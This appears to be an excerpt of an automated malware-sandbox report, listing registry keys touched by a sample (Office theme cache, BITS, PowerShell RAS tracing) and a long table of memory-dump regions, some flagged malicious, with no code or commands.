TM04033919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033921
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033929
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457485
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033927
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033937
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998159
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 254 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
23D76386000
heap
page read and write
 malicious
54F3000
trusted library allocation
page read and write
 malicious
2A97799D000
heap
page read and write
 malicious
23D763C0000
heap
page read and write
 malicious
24A6ABDC000
heap
page read and write
 malicious
24A00350000
trusted library allocation
page read and write
 malicious
24A00342000
trusted library allocation
page read and write
 malicious
24A6AB50000
heap
page read and write
 malicious
24A00083000
trusted library allocation
page read and write
 malicious
2A52B602000
heap
page read and write
 malicious
2A52B5BD000
heap
page read and write
 malicious
23D7639D000
heap
page read and write
 malicious
2A52B7C5000
heap
page read and write
 malicious
56F3000
trusted library allocation
page read and write
 malicious
2A901946000
trusted library allocation
page read and write
 malicious
2A52B5A6000
heap
page read and write
 malicious
23D765E5000
heap
page read and write
 malicious
2A900001000
trusted library allocation
page read and write
 malicious
2A52B578000
heap
page read and write
 malicious
24A6CBF7000
heap
page read and write
 malicious
2A52B5E0000
heap
page read and write
 malicious
2A975600000
heap
page read and write
 malicious
23D76358000
heap
page read and write
 malicious
7FF7BE47B000
trusted library allocation
page read and write
24A6CB7C000
heap
page read and write
47CE000
trusted library allocation
page read and write
60A9000
heap
page read and write
2A52B7C0000
heap
page read and write
86BD000
trusted library allocation
page read and write
3381000
heap
page read and write
28C500BC000
heap
page read and write
F23727E000
stack
page read and write
2A9777B0000
heap
page read and write
6049000
heap
page read and write
7EE000
stack
page read and write
6040000
heap
page read and write
2A901C66000
trusted library allocation
page read and write
6367000
trusted library allocation
page read and write
8650000
heap
page read and write
24A6CD40000
heap
page read and write
2A52B570000
heap
page read and write
7A10000
trusted library allocation
page execute and read and write
8670000
trusted library allocation
page read and write
651C000
stack
page read and write
605B000
heap
page read and write
7C50000
trusted library allocation
page read and write
46AE000
stack
page read and write
28C5005B000
heap
page read and write
24A6AD25000
heap
page read and write
6066000
heap
page read and write
24A00013000
trusted library allocation
page read and write
28C55540000
trusted library allocation
page read and write
8FD617E000
unkown
page readonly
28C50093000
heap
page read and write
F71D5FE000
stack
page read and write
7FF7BE63A000
trusted library allocation
page read and write
7FF7BE482000
trusted library allocation
page read and write
7A40000
trusted library allocation
page read and write
28C55960000
remote allocation
page read and write
7FF7BE710000
trusted library allocation
page read and write
609E000
heap
page read and write
28C500B1000
heap
page read and write
79E0000
trusted library allocation
page read and write
24A6AC3A000
heap
page read and write
737E000
stack
page read and write
7A30000
trusted library allocation
page read and write
F236923000
stack
page read and write
F71D8FF000
stack
page read and write
7FF7BE6D0000
trusted library allocation
page read and write
290E000
stack
page read and write
63D000
stack
page read and write
7FF7BE600000
trusted library allocation
page read and write
28C50040000
heap
page read and write
47DC000
trusted library allocation
page read and write
481C000
trusted library allocation
page read and write
8795000
trusted library allocation
page read and write
60C5000
heap
page read and write
28C50800000
heap
page read and write
86A0000
heap
page read and write
24A00121000
trusted library allocation
page read and write
60A3000
heap
page read and write
28C50071000
heap
page read and write
28C5091A000
heap
page read and write
24A6ACE0000
trusted library allocation
page read and write
CE8CAFD000
stack
page read and write
24A00115000
trusted library allocation
page read and write
79B5000
heap
page read and write
2A901C6A000
trusted library allocation
page read and write
CE8CCFF000
stack
page read and write
34C0000
trusted library allocation
page read and write
F71DDFE000
stack
page read and write
76EE000
stack
page read and write
F2373FC000
stack
page read and write
690000
heap
page read and write
604C000
heap
page read and write
CE8C18A000
stack
page read and write
7FF7BE640000
trusted library allocation
page execute and read and write
24A6AD10000
heap
page readonly
7AA000
heap
page read and write
28C555D0000
trusted library allocation
page read and write
24A6CB30000
heap
page read and write
24A00041000
trusted library allocation
page read and write
8E7000
heap
page read and write
5BC44F9000
stack
page read and write
24A0005C000
trusted library allocation
page read and write
F71D4FA000
stack
page read and write
28C5002B000
heap
page read and write
8FD7479000
stack
page read and write
28C556F7000
heap
page read and write
24A6C5D0000
heap
page execute and read and write
7FF7BE46D000
trusted library allocation
page execute and read and write
49DE000
stack
page read and write
2A901676000
trusted library allocation
page read and write
743A000
stack
page read and write
60B0000
heap
page read and write
753B000
stack
page read and write
28C50913000
heap
page read and write
2FB0000
heap
page read and write
7BC0000
trusted library allocation
page read and write
64E000
stack
page read and write
86B0000
trusted library allocation
page read and write
480E000
trusted library allocation
page read and write
28C50904000
heap
page read and write
7C20000
trusted library allocation
page read and write
74FE000
stack
page read and write
28C50E40000
trusted library allocation
page read and write
28C5091A000
heap
page read and write
23D76350000
heap
page read and write
7FF7BE790000
trusted library allocation
page read and write
F236C7E000
stack
page read and write
24A10001000
trusted library allocation
page read and write
2A975648000
heap
page read and write
33E1000
heap
page read and write
2A977950000
heap
page read and write
5B45000
heap
page read and write
8B03000
heap
page read and write
6091000
heap
page read and write
28C55800000
trusted library allocation
page read and write
7902000
heap
page read and write
603F000
stack
page read and write
28C500AD000
heap
page read and write
34F0000
heap
page execute and read and write
77BF000
stack
page read and write
A1E000
stack
page read and write
8FD607E000
stack
page read and write
7FF7BE7A0000
trusted library allocation
page read and write
780000
heap
page read and write
772E000
stack
page read and write
24A6AC70000
heap
page read and write
28C558B0000
trusted library allocation
page read and write
7FF7BE631000
trusted library allocation
page read and write
3305000
trusted library allocation
page execute and read and write
28C5562E000
heap
page read and write
783000
heap
page read and write
5BC447E000
stack
page read and write
7BF0000
trusted library allocation
page read and write
606C000
heap
page read and write
8AE0000
heap
page read and write
2A9101B4000
trusted library allocation
page read and write
24A6C5B0000
heap
page execute and read and write
680000
trusted library allocation
page read and write
600000
heap
page read and write
6081000
heap
page read and write
820000
heap
page read and write
24A6AD20000
heap
page read and write
F71DEFB000
stack
page read and write
79A2000
heap
page read and write
7FF7BE470000
trusted library allocation
page read and write
6066000
heap
page read and write
F236FFD000
stack
page read and write
733B000
stack
page read and write
28C500FE000
heap
page read and write
8FD5F7E000
unkown
page readonly
4A6B000
stack
page read and write
2A9017E3000
trusted library allocation
page read and write
3377000
heap
page read and write
5B20000
heap
page read and write
2A975700000
heap
page read and write
F71D9FF000
stack
page read and write
869F000
stack
page read and write
6D0000
heap
page read and write
28C55713000
heap
page read and write
24A6AB91000
heap
page read and write
609E000
heap
page read and write
2A976FD0000
trusted library allocation
page read and write
606F000
heap
page read and write
7983000
heap
page read and write
28C50200000
heap
page read and write
46BF000
heap
page read and write
DF0000
heap
page read and write
7FF7BE516000
trusted library allocation
page read and write
2A9016C8000
trusted library allocation
page read and write
7FF7BE700000
trusted library allocation
page read and write
7FF7BE620000
trusted library allocation
page read and write
334D000
heap
page read and write
A90000
heap
page read and write
5B64000
heap
page read and write
2F30000
heap
page read and write
24A6ABAF000
heap
page read and write
7A50000
trusted library allocation
page read and write
28C51530000
trusted library allocation
page read and write
291B000
heap
page read and write
2A900C2D000
trusted library allocation
page read and write
24A6CC50000
heap
page read and write
7FF7BE650000
trusted library allocation
page execute and read and write
D77000
stack
page read and write
CE8C5FE000
stack
page read and write
2A901BA1000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
28C500A8000
heap
page read and write
78E0000
heap
page read and write
28C55804000
trusted library allocation
page read and write
79E2000
trusted library allocation
page read and write
2A9757B0000
trusted library allocation
page read and write
74BB000
stack
page read and write
28C55706000
heap
page read and write
7B6E000
stack
page read and write
7FF7BE6C0000
trusted library allocation
page read and write
28C556EA000
heap
page read and write
60A3000
heap
page read and write
5F3E000
stack
page read and write
7FF7BE670000
trusted library allocation
page execute and read and write
24A6AB97000
heap
page read and write
47CC000
trusted library allocation
page read and write
7FF7BE770000
trusted library allocation
page read and write
34F5000
heap
page execute and read and write
77E2000
heap
page read and write
7FF7BE740000
trusted library allocation
page read and write
24A6AD65000
heap
page read and write
F236CFE000
stack
page read and write
347E000
stack
page read and write
7FF7BE611000
trusted library allocation
page read and write
7AA0000
heap
page execute and read and write
24A6AD00000
trusted library allocation
page read and write
2A9776E0000
heap
page read and write
28C555D0000
trusted library allocation
page read and write
24A00326000
trusted library allocation
page read and write
5BC3F3E000
stack
page read and write
A94000
heap
page read and write
24A0055A000
trusted library allocation
page read and write
28C50802000
heap
page read and write
7FF7BE48D000
trusted library allocation
page execute and read and write
5BC3EB2000
stack
page read and write
47CA000
trusted library allocation
page read and write
2A9770A0000
heap
page execute and read and write
7FF7BE6B0000
trusted library allocation
page read and write
5301000
trusted library allocation
page read and write
24A6CC0C000
heap
page read and write
24A6ACA0000
heap
page read and write
7FF7BE720000
trusted library allocation
page read and write
24A6CD30000
trusted library allocation
page read and write
2A900085000
trusted library allocation
page read and write
24A6CC1C000
heap
page read and write
28C55890000
trusted library allocation
page read and write
28C56000000
heap
page read and write
24A6C6D0000
heap
page read and write
7FF7BE7C0000
trusted library allocation
page read and write
60BF000
heap
page read and write
3500000
trusted library allocation
page read and write
7FF7BE4BC000
trusted library allocation
page execute and read and write
24A0015B000
trusted library allocation
page read and write
4816000
trusted library allocation
page read and write
28C55800000
trusted library allocation
page read and write
906000
heap
page read and write
28C50815000
heap
page read and write
28C500FE000
heap
page read and write
650000
heap
page read and write
28C5008E000
heap
page read and write
8EF000
heap
page read and write
23D765E0000
heap
page read and write
7FF7BE536000
trusted library allocation
page read and write
46B4000
heap
page read and write
5BC437E000
stack
page read and write
7FF7BE760000
trusted library allocation
page read and write
5BC4578000
stack
page read and write
32D0000
trusted library allocation
page read and write
28C555D2000
trusted library allocation
page read and write
6329000
trusted library allocation
page read and write
4BAE000
stack
page read and write
8FD777E000
unkown
page readonly
28C50B00000
trusted library allocation
page read and write
8E7000
heap
page read and write
2F39000
heap
page read and write
6096000
heap
page read and write
7FF7BE580000
trusted library allocation
page execute and read and write
520E000
stack
page read and write
47F8000
trusted library allocation
page read and write
480C000
trusted library allocation
page read and write
24A004B6000
trusted library allocation
page read and write
7FF7BE7D0000
trusted library allocation
page read and write
86C0000
trusted library allocation
page execute and read and write
7550000
heap
page read and write
7FF7BE619000
trusted library allocation
page read and write
7DF4C6B30000
trusted library allocation
page execute and read and write
28C556EF000
heap
page read and write
4800000
trusted library allocation
page read and write
28C556D3000
heap
page read and write
7FF7BE790000
trusted library allocation
page read and write
39A000
stack
page read and write
2A977746000
heap
page read and write
3374000
heap
page read and write
32E9000
trusted library allocation
page read and write
F237DCE000
stack
page read and write
7FF7BE546000
trusted library allocation
page execute and read and write
875E000
stack
page read and write
7962000
heap
page read and write
46B6000
heap
page read and write
CE8CDFB000
stack
page read and write
7965000
heap
page read and write
24A6AA60000
heap
page read and write
7FF7BE650000
trusted library allocation
page execute and read and write
5B4F000
heap
page read and write
2A975688000
heap
page read and write
28C5568D000
heap
page read and write
3302000
trusted library allocation
page read and write
8FD7D7E000
unkown
page readonly
8FD7CFE000
stack
page read and write
2A90022D000
trusted library allocation
page read and write
747E000
stack
page read and write
7B2E000
stack
page read and write
2A52B440000
heap
page read and write
47BA000
trusted library allocation
page read and write
F236DFC000
stack
page read and write
24A6AD60000
heap
page read and write
2A977984000
heap
page read and write
60A9000
heap
page read and write
7A00000
trusted library allocation
page read and write
797B000
heap
page read and write
79B8000
heap
page read and write
28C55700000
heap
page read and write
28C50028000
heap
page read and write
28C4FFE0000
heap
page read and write
8FD58FB000
stack
page read and write
871E000
stack
page read and write
32DD000
trusted library allocation
page execute and read and write
6E0000
heap
page read and write
518D000
stack
page read and write
2A975640000
heap
page read and write
8ACC000
stack
page read and write
47E8000
trusted library allocation
page read and write
2F7E000
stack
page read and write
6096000
heap
page read and write
32E0000
trusted library allocation
page read and write
AA0000
heap
page read and write
7FF7BE740000
trusted library allocation
page read and write
608F000
heap
page read and write
7FF7BE6A0000
trusted library allocation
page read and write
7FF7BE6F0000
trusted library allocation
page read and write
8FD687B000
stack
page read and write
7BD0000
trusted library allocation
page read and write
28C55710000
heap
page read and write
79E7000
trusted library allocation
page read and write
28C55530000
trusted library allocation
page read and write
2A9776DE000
heap
page read and write
4CFC000
stack
page read and write
7FF7BE6F0000
trusted library allocation
page read and write
2A9015EC000
trusted library allocation
page read and write
5BC487B000
stack
page read and write
2A976FD3000
trusted library allocation
page read and write
7FF7BE540000
trusted library allocation
page execute and read and write
24A6CB54000
heap
page read and write
28C556C7000
heap
page read and write
24A6AB59000
heap
page read and write
28C558A0000
trusted library allocation
page read and write
52F0000
heap
page read and write
24A6C6B0000
heap
page execute and read and write
28C55655000
heap
page read and write
607A000
heap
page read and write
2A977140000
heap
page read and write
4E3C000
stack
page read and write
5BC42FD000
stack
page read and write
4F3E000
stack
page read and write
6309000
trusted library allocation
page read and write
5BC5203000
stack
page read and write
7C60000
trusted library allocation
page read and write
2A901695000
trusted library allocation
page read and write
23D763F5000
heap
page read and write
28C55890000
trusted library allocation
page read and write
7FF7BE710000
trusted library allocation
page read and write
7540000
heap
page read and write
28C556FD000
heap
page read and write
28C55650000
heap
page read and write
7FF7BE642000
trusted library allocation
page read and write
28C555B0000
trusted library allocation
page read and write
28C50102000
heap
page read and write
896000
heap
page read and write
7BB0000
trusted library allocation
page read and write
2A977690000
heap
page read and write
F71DBFE000
stack
page read and write
5BC427E000
stack
page read and write
7BE0000
trusted library allocation
page read and write
24A0011E000
trusted library allocation
page read and write
28C5586F000
trusted library allocation
page read and write
28C50000000
heap
page read and write
859E000
stack
page read and write
3300000
trusted library allocation
page read and write
7FF7BE660000
trusted library allocation
page read and write
2A901A0E000
trusted library allocation
page read and write
28C558D0000
trusted library allocation
page read and write
7FF7BE680000
trusted library allocation
page read and write
73FD000
stack
page read and write
83E000
heap
page read and write
828000
heap
page read and write
32D4000
trusted library allocation
page read and write
52DD000
stack
page read and write
28C50113000
heap
page read and write
24A6ABD6000
heap
page read and write
28C555D1000
trusted library allocation
page read and write
28C5587A000
trusted library allocation
page read and write
28C50102000
heap
page read and write
7FF7BE662000
trusted library allocation
page read and write
28C55960000
remote allocation
page read and write
2EED000
stack
page read and write
7FF7BE622000
trusted library allocation
page read and write
23D77C80000
heap
page read and write
7C10000
trusted library allocation
page read and write
2A975720000
heap
page read and write
F236EFE000
stack
page read and write
288F000
unkown
page read and write
28C55643000
heap
page read and write
4CAF000
stack
page read and write
8FD5E77000
stack
page read and write
28C555F0000
trusted library allocation
page read and write
28C500B1000
heap
page read and write
2A910001000
trusted library allocation
page read and write
2A901693000
trusted library allocation
page read and write
607A000
heap
page read and write
23D76290000
heap
page read and write
28C50900000
heap
page read and write
7FF7BE49B000
trusted library allocation
page read and write
7FF7BE6E0000
trusted library allocation
page read and write
28C5095A000
heap
page read and write
28C55C30000
trusted library allocation
page read and write
2A52B680000
heap
page read and write
28C50117000
heap
page read and write
777E000
stack
page read and write
CE8C4FE000
stack
page read and write
641B000
stack
page read and write
2A90188A000
trusted library allocation
page read and write
7924000
heap
page read and write
34E0000
trusted library allocation
page execute and read and write
4A2F000
stack
page read and write
47D0000
trusted library allocation
page read and write
2A977940000
heap
page read and write
2A975750000
heap
page read and write
F71DCFE000
stack
page read and write
4D90000
heap
page execute and read and write
28C55BA0000
trusted library allocation
page read and write
F2369EF000
stack
page read and write
798B000
heap
page read and write
2A9757D0000
trusted library allocation
page read and write
47B8000
trusted library allocation
page read and write
2A977270000
heap
page execute and read and write
2910000
heap
page read and write
73BE000
stack
page read and write
28C50013000
heap
page read and write
7FF7BE6E0000
trusted library allocation
page read and write
58CE000
stack
page read and write
6091000
heap
page read and write
7FF7BE464000
trusted library allocation
page read and write
2A90167E000
trusted library allocation
page read and write
28C5009E000
heap
page read and write
60B0000
heap
page read and write
F23707D000
stack
page read and write
7FF7BE51C000
trusted library allocation
page execute and read and write
7FF7BE760000
trusted library allocation
page read and write
7FF7BE530000
trusted library allocation
page read and write
28C555C0000
trusted library allocation
page read and write
899000
heap
page read and write
7A6000
heap
page read and write
2A977979000
heap
page read and write
2A9757F0000
heap
page read and write
47BC000
trusted library allocation
page read and write
60CD000
heap
page read and write
3330000
heap
page readonly
2A977152000
heap
page read and write
24A6CB4D000
heap
page read and write
28C50106000
heap
page read and write
28C55960000
remote allocation
page read and write
7FF7BE690000
trusted library allocation
page read and write
28C555F0000
trusted library allocation
page read and write
7912000
heap
page read and write
A20000
heap
page read and write
47D8000
trusted library allocation
page read and write
5BC43FE000
stack
page read and write
8AE4000
heap
page read and write
2A97798C000
heap
page read and write
24A004EE000
trusted library allocation
page read and write
7FF7BE750000
trusted library allocation
page read and write
24A00118000
trusted library allocation
page read and write
7FF7BE700000
trusted library allocation
page read and write
3340000
heap
page read and write
7970000
heap
page read and write
2A977790000
heap
page read and write
7FF7BE680000
trusted library allocation
page read and write
7BAD000
stack
page read and write
34BF000
stack
page read and write
2A977340000
heap
page read and write
4D8E000
stack
page read and write
2A910072000
trusted library allocation
page read and write
24A007EE000
trusted library allocation
page read and write
24A0010F000
trusted library allocation
page read and write
24A00153000
trusted library allocation
page read and write
28C55662000
heap
page read and write
4FE0000
trusted library allocation
page read and write
24A6CD66000
heap
page read and write
7FF7BE7B0000
trusted library allocation
page read and write
6C0000
heap
page read and write
2A975609000
heap
page read and write
CE8C7FF000
stack
page read and write
5BC45F9000
stack
page read and write
60BE000
heap
page read and write
5366000
trusted library allocation
page read and write
28C55877000
trusted library allocation
page read and write
28C51501000
trusted library allocation
page read and write
7FF7BE463000
trusted library allocation
page execute and read and write
2A9016C6000
trusted library allocation
page read and write
7FF7BE620000
trusted library allocation
page execute and read and write
60A5000
heap
page read and write
4CFC000
stack
page read and write
7FF7BE7D0000
trusted library allocation
page read and write
7FF7BE7B0000
trusted library allocation
page read and write
28C55600000
heap
page read and write
7A0000
heap
page read and write
F2370FE000
stack
page read and write
2A977145000
heap
page read and write
28C556C5000
heap
page read and write
7FF7BE630000
trusted library allocation
page execute and read and write
28C50902000
heap
page read and write
7FF7BE462000
trusted library allocation
page read and write
2F2E000
stack
page read and write
28C55B60000
trusted library allocation
page read and write
34C8000
trusted library allocation
page read and write
28C500AB000
heap
page read and write
7FF7BE670000
trusted library allocation
page read and write
51CF000
stack
page read and write
24A6ACC0000
trusted library section
page read and write
6301000
trusted library allocation
page read and write
8A8B000
stack
page read and write
28C5008C000
heap
page read and write
2A9756F1000
heap
page read and write
7FF7BE690000
trusted library allocation
page read and write
5BC524E000
stack
page read and write
28C55621000
heap
page read and write
28C55800000
trusted library allocation
page read and write
24A6CBD6000
heap
page read and write
8660000
trusted library allocation
page execute and read and write
47DA000
trusted library allocation
page read and write
7FF7BE53C000
trusted library allocation
page execute and read and write
28C55C30000
trusted library allocation
page read and write
7FF7BE780000
trusted library allocation
page read and write
545D000
trusted library allocation
page read and write
28C5007B000
heap
page read and write
60B7000
heap
page read and write
2A975644000
heap
page read and write
F23737E000
stack
page read and write
28C502E0000
heap
page read and write
24A00001000
trusted library allocation
page read and write
8FD697E000
unkown
page readonly
7A20000
trusted library allocation
page read and write
86D0000
heap
page read and write
24A6D130000
heap
page read and write
F236D7E000
stack
page read and write
60BE000
heap
page read and write
28C556AA000
heap
page read and write
5BC47FF000
stack
page read and write
2A52B520000
heap
page read and write
524E000
stack
page read and write
23D762B0000
heap
page read and write
2A97568E000
heap
page read and write
7FF7BE490000
trusted library allocation
page read and write
5A1E000
stack
page read and write
7FF7BE6B0000
trusted library allocation
page read and write
47DE000
trusted library allocation
page read and write
24A00049000
trusted library allocation
page read and write
47C0000
trusted library allocation
page read and write
28C50076000
heap
page read and write
7FF7BE770000
trusted library allocation
page read and write
90C000
heap
page read and write
7C00000
trusted library allocation
page read and write
F2369AE000
stack
page read and write
4D3D000
stack
page read and write
D7D000
stack
page read and write
46B0000
heap
page read and write
60B9000
heap
page read and write
878000
heap
page read and write
59CF000
stack
page read and write
28C55910000
trusted library allocation
page read and write
28C55900000
trusted library allocation
page read and write
7FF7BE566000
trusted library allocation
page execute and read and write
47C8000
trusted library allocation
page read and write
2A977724000
heap
page read and write
28C558F0000
trusted library allocation
page read and write
351B000
heap
page read and write
7FF7BE6C0000
trusted library allocation
page read and write
4DC0000
heap
page read and write
7C70000
trusted library allocation
page read and write
28C555A0000
trusted library allocation
page read and write
24A6AD30000
trusted library allocation
page read and write
28C55702000
heap
page read and write
5BC3FBF000
stack
page read and write
7FF7BE720000
trusted library allocation
page read and write
67A000
stack
page read and write
5BC477F000
stack
page read and write
4818000
trusted library allocation
page read and write
284E000
unkown
page read and write
2A975790000
trusted library allocation
page read and write
2A52B5DD000
heap
page read and write
2A9015F4000
trusted library allocation
page read and write
28C5570A000
heap
page read and write
299000
stack
page read and write
CE8C8FE000
stack
page read and write
28C50770000
trusted library allocation
page read and write
47BE000
trusted library allocation
page read and write
7FF7BE483000
trusted library allocation
page execute and read and write
24A6C5B7000
heap
page execute and read and write
2EAE000
stack
page read and write
7C40000
trusted library allocation
page read and write
7FF7BE7C0000
trusted library allocation
page read and write
605B000
heap
page read and write
886000
heap
page read and write
28C51080000
trusted library allocation
page read and write
28C555C0000
trusted library allocation
page read and write
3320000
trusted library allocation
page read and write
787000
heap
page read and write
7FF7BE730000
trusted library allocation
page read and write
7AEE000
stack
page read and write
5BC46FE000
stack
page read and write
2A910010000
trusted library allocation
page read and write
2AE0000
heap
page read and write
7FF7BE510000
trusted library allocation
page read and write
60A5000
heap
page read and write
28C558B0000
trusted library allocation
page read and write
6081000
heap
page read and write
24A00036000
trusted library allocation
page read and write
32D3000
trusted library allocation
page execute and read and write
7FF7BE615000
trusted library allocation
page read and write
2A975510000
heap
page read and write
2A9757C0000
heap
page readonly
7C30000
trusted library allocation
page read and write
608F000
heap
page read and write
5BC4678000
stack
page read and write
7FF7BE484000
trusted library allocation
page read and write
7FF7BE480000
trusted library allocation
page read and write
47F0000
trusted library allocation
page read and write
CE8CBFE000
stack
page read and write
481A000
trusted library allocation
page read and write
2A975660000
heap
page read and write
7FF7BE6D0000
trusted library allocation
page read and write
28CE000
stack
page read and write
2A52B540000
heap
page read and write
7FF7BE5A0000
trusted library allocation
page execute and read and write
7FF7BE6A0000
trusted library allocation
page read and write
5B2A000
heap
page read and write
24A6AC50000
heap
page read and write
28C500AD000
heap
page read and write
24A6CD33000
trusted library allocation
page read and write
2A97771B000
heap
page read and write
3510000
heap
page read and write
2A977047000
heap
page execute and read and write
7FF7BE750000
trusted library allocation
page read and write
2A975613000
heap
page read and write
7FF7BE780000
trusted library allocation
page read and write
2A9757F5000
heap
page read and write
5B1E000
stack
page read and write
28C556DC000
heap
page read and write
60BE000
heap
page read and write
5770000
trusted library allocation
page read and write
514E000
stack
page read and write
7FF7BE520000
trusted library allocation
page execute and read and write
24A10067000
trusted library allocation
page read and write
23D761B0000
heap
page read and write
2A977040000
heap
page execute and read and write
4B6E000
stack
page read and write
8FD757E000
unkown
page readonly
8FD767B000
stack
page read and write
7FF7BE730000
trusted library allocation
page read and write
24A6AB8F000
heap
page read and write
4DFE000
stack
page read and write
8F1000
heap
page read and write
2A97798F000
heap
page read and write
4F50000
heap
page read and write
F71D6FE000
stack
page read and write
4DC8000
heap
page read and write
7FF7BE7A0000
trusted library allocation
page read and write
D3C000
stack
page read and write
7940000
heap
page read and write
F236F7E000
stack
page read and write
24A10011000
trusted library allocation
page read and write
2F80000
heap
page read and write
There are 680 hidden memdumps, click here to show them.